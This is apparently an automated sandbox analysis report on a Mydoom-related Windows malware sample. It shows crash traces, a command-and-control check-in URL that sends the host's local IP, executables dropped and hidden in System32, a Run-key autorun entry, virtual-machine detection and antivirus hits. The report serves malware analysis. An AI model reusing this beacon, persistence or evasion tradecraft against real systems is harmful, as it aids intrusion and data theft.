exception.instruction_r: 8b 06 89 45 e4 33 47 50 8a c8 32 cc 89 45 e4 32
exception.symbol: RtlImageNtHeader+0x139 RtlDeleteCriticalSection-0x1358 ntdll+0x332cd
exception.instruction: mov eax, dword ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209613
exception.address: 0x77ba32cd
registers.esp: 76544192
registers.edi: 7340032
registers.eax: 20993
registers.ebp: 76544232
registers.edx: 2047
registers.ebx: 3484392
registers.esi: 3652336
registers.ecx: 33
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0xac6 RtlDeleteCriticalSection-0x9cb ntdll+0x33c5a @ 0x77ba3c5a
RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cfe @ 0x77ba3cfe
DnsApiFree+0x4a DnsApiAlloc-0x2e dnsapi+0x3195 @ 0x74aa3195
DnsApiFree+0x22 DnsApiAlloc-0x56 dnsapi+0x316d @ 0x74aa316d
WSPStartup-0x36b4 mswsock+0x53f7 @ 0x73af53f7
WSPStartup-0x3730 mswsock+0x537b @ 0x73af537b
WSPStartup-0x386f mswsock+0x523c @ 0x73af523c
WSALookupServiceBeginW+0x257 WSAEventSelect-0xade ws2_32+0x59b1 @ 0x76d959b1
WSALookupServiceBeginW+0x233 WSAEventSelect-0xb02 ws2_32+0x598d @ 0x76d9598d
WSALookupServiceBeginW+0x1c2 WSAEventSelect-0xb73 ws2_32+0x591c @ 0x76d9591c
WSALookupServiceBeginW+0x72 WSAEventSelect-0xcc3 ws2_32+0x57cc @ 0x76d957cc
WSALookupServiceBeginA+0x74 WahCloseApcHelper-0x3b1 ws2_32+0xa6b6 @ 0x76d9a6b6
gethostname+0x1bd WSALookupServiceNextA-0x63 ws2_32+0xa218 @ 0x76d9a218
gethostbyname+0xe7 WSCInstallProviderAndChains-0x1039 ws2_32+0x1775a @ 0x76da775a
New_ws2_32_gethostbyname@4+0xab New_ws2_32_getsockname@12-0x63 @ 0x7426c3e3
smnss+0x6326 @ 0x406326
smnss+0x600e @ 0x40600e
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45

exception.instruction_r: 8b 49 04 89 55 ec 8b 12 3b d1 0f 85 fa 25 03 00
exception.symbol: RtlCleanUpTEBLangLists+0x9a RtlGetLastWin32Error-0x3a3 ntdll+0x58118
exception.instruction: mov ecx, dword ptr [ecx + 4]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 360728
exception.address: 0x77bc8118
registers.esp: 76541648
registers.edi: 3484264
registers.eax: 3484400
registers.ebp: 76541684
registers.edx: 3484512
registers.ebx: 3473408
registers.esi: 3484392
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45

exception.instruction_r: 8b 06 89 45 e4 33 47 50 8a c8 32 cc 89 45 e4 32
exception.symbol: RtlImageNtHeader+0x139 RtlDeleteCriticalSection-0x1358 ntdll+0x332cd
exception.instruction: mov eax, dword ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 209613
exception.address: 0x77ba32cd
registers.esp: 76544192
registers.edi: 7340032
registers.eax: 20993
registers.ebp: 76544232
registers.edx: 2047
registers.ebx: 3482072
registers.esi: 3650016
registers.ecx: 1
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7
RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2
GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d
smnss+0x6187 @ 0x406187
smnss+0x5fac @ 0x405fac
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45

exception.instruction_r: 31 06 8a 46 01 32 06 32 46 02 38 46 03 0f 85 97
exception.symbol: RtlImageNtHeader+0x1224 RtlDeleteCriticalSection-0x26d ntdll+0x343b8
exception.instruction: xor dword ptr [esi], eax
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 213944
exception.address: 0x77ba43b8
registers.esp: 78641344
registers.edi: 7340032
registers.eax: 1205673936
registers.ebp: 78641384
registers.edx: 2047
registers.ebx: 3481256
registers.esi: 3253248
registers.ecx: 96
1 0 0

__exception__

stacktrace:
RtlImageNtHeader+0xac6 RtlDeleteCriticalSection-0x9cb ntdll+0x33c5a @ 0x77ba3c5a
RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cfe @ 0x77ba3cfe
DnsApiFree+0x4a DnsApiAlloc-0x2e dnsapi+0x3195 @ 0x74aa3195
DnsApiFree+0x22 DnsApiAlloc-0x56 dnsapi+0x316d @ 0x74aa316d
NdrCorrelationPass+0x2b4 NdrSimpleStructMarshall-0x125 rpcrt4+0x18a68 @ 0x75638a68
NdrSimpleStructBufferSize+0x418 NdrPointerUnmarshall-0x4d rpcrt4+0x190df @ 0x756390df
NdrPointerUnmarshall+0x30 NdrConformantStructUnmarshall-0x333 rpcrt4+0x1915c @ 0x7563915c
NdrSimpleStructBufferSize+0x418 NdrPointerUnmarshall-0x4d rpcrt4+0x190df @ 0x756390df
NdrPointerUnmarshall+0x30 NdrConformantStructUnmarshall-0x333 rpcrt4+0x1915c @ 0x7563915c
NdrClientInitialize+0x125 I_RpcFreeBuffer-0x13c rpcrt4+0x17116 @ 0x75637116
NdrClientCall2+0x155 RpcAsyncInitializeHandle-0xb4 rpcrt4+0xb015a @ 0x756d015a
DnsValidateName_W+0xcde DnsFree-0x7d dnsapi+0x42ee @ 0x74aa42ee
DnsValidateName_W+0xc0c DnsFree-0x14f dnsapi+0x421c @ 0x74aa421c
DnsQueryExW+0xed Reg_GetValueEx-0x13a8 dnsapi+0x4528 @ 0x74aa4528
DnsQueryExW+0x96 Reg_GetValueEx-0x13ff dnsapi+0x44d1 @ 0x74aa44d1
DnsQueryExW+0x39 Reg_GetValueEx-0x145c dnsapi+0x4474 @ 0x74aa4474
WSPStartup-0x3bd8 mswsock+0x4ed3 @ 0x73af4ed3
WSPStartup-0x3d4c mswsock+0x4d5f @ 0x73af4d5f
WSPStartup-0x3f68 mswsock+0x4b43 @ 0x73af4b43
FreeAddrInfoW+0x198 WSALookupServiceNextW-0x9 ws2_32+0x4cb3 @ 0x76d94cb3
FreeAddrInfoW+0x178 WSALookupServiceNextW-0x29 ws2_32+0x4c93 @ 0x76d94c93
WSALookupServiceNextW+0xff WSALookupServiceEnd-0x47e ws2_32+0x4dbb @ 0x76d94dbb
WSALookupServiceNextW+0x6a WSALookupServiceEnd-0x513 ws2_32+0x4d26 @ 0x76d94d26
WSALookupServiceNextA+0x52 WSALookupServiceBeginA-0x375 ws2_32+0xa2cd @ 0x76d9a2cd
gethostname+0x1d0 WSALookupServiceNextA-0x50 ws2_32+0xa22b @ 0x76d9a22b
gethostbyname+0xe7 WSCInstallProviderAndChains-0x1039 ws2_32+0x1775a @ 0x76da775a
New_ws2_32_gethostbyname@4+0xab New_ws2_32_getsockname@12-0x63 @ 0x7426c3e3
smnss+0x6326 @ 0x406326
smnss+0x600e @ 0x40600e
smnss+0x2f1d @ 0x402f1d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45

exception.instruction_r: 8b 49 04 89 55 ec 8b 12 3b d1 0f 85 fa 25 03 00
exception.symbol: RtlCleanUpTEBLangLists+0x9a RtlGetLastWin32Error-0x3a3 ntdll+0x58118
exception.instruction: mov ecx, dword ptr [ecx + 4]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 360728
exception.address: 0x77bc8118
registers.esp: 78636504
registers.edi: 3481240
registers.eax: 3481264
registers.ebp: 78636540
registers.edx: 3484544
registers.ebx: 3473408
registers.esi: 3481256
registers.ecx: 0
Status: 1  Return: 0  Repeated: 0
Performs some HTTP requests (1 event)
request GET http://epsaphpaaa.ws/imgs/krewa/nqxa.php?id=7a45xloh&s5=3159&lip=192.168.168.209&win=fWinS
Creates executable files on the filesystem (6 events)
file C:\Windows\System32\zipfi.dll
file C:\Windows\System32\shervans.dll
file C:\Windows\System32\satornas.dll
file C:\Windows\System32\ctfmen.exe
file C:\Windows\System32\grcopy.dll
file C:\Windows\System32\zipfiaq.dll
Creates hidden or system file (1 event)
Time & API: SetFileAttributesW
Arguments:
  file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
  filepath_r: C:\Windows\system32\satornas.dll
  filepath: C:\Windows\System32\satornas.dll
Status: 1  Return: 1  Repeated: 0
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)
Time & API: LookupPrivilegeValueW
Arguments:
  system_name:
  privilege_name: SeDebugPrivilege
Status: 1  Return: 1  Repeated: 0
Raised Suricata alerts (3 events)
suricata ETPRO MALWARE Worm.Mydoom Checkin
suricata ETPRO MALWARE User-Agent (explwer)
suricata ThreatFox Loki Password Stealer (PWS) botnet C2 traffic (ip:port - confidence level: 75%)
Detects virtualization software with SCSI Disk Identifier trick(s) (2 events)
registry HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0
registry HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\1
Installs itself for autorun at Windows startup (2 events)
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ctfmen reg_value C:\Windows\system32\ctfmen.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ctfmen reg_value C:\Windows\system32\ctfmen.exe
File has been identified by 13 AntiVirus engines on IRMA as malicious (13 events)
G Data Antivirus (Windows) Virus: Dropped:Generic.Mydoom.5713DF4B (Engine A)
Avast Core Security (Linux) Win32:Mydoom-BJ [Wrm]
C4S ClamAV (Linux) Win.Malware.Generickdz-9918324-0
F-Secure Antivirus (Linux) Trojan.TR/Downloader.Gen [Aquarius]
Sophos Anti-Virus (Linux) Mal/Behav-104
eScan Antivirus (Linux) Dropped:Generic.Mydoom.5713DF4B(DB)
ESET Security (Windows) a variant of Win32/Agent.NHB worm
McAfee CLI scanner (Linux) Trojan-FRMT
DrWeb Antivirus (Linux) Trojan.DownLoader8.56532
ClamAV (Linux) Win.Malware.Generickdz-9918324-0
Bitdefender Antivirus (Linux) Dropped:Generic.Mydoom.5713DF4B
Kaspersky Standard (Windows) Trojan.Win32.Small.acli
Emsisoft Commandline Scanner (Windows) Dropped:Generic.Mydoom.5713DF4B (B)
Screenshots
Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action VT Location
No hosts contacted.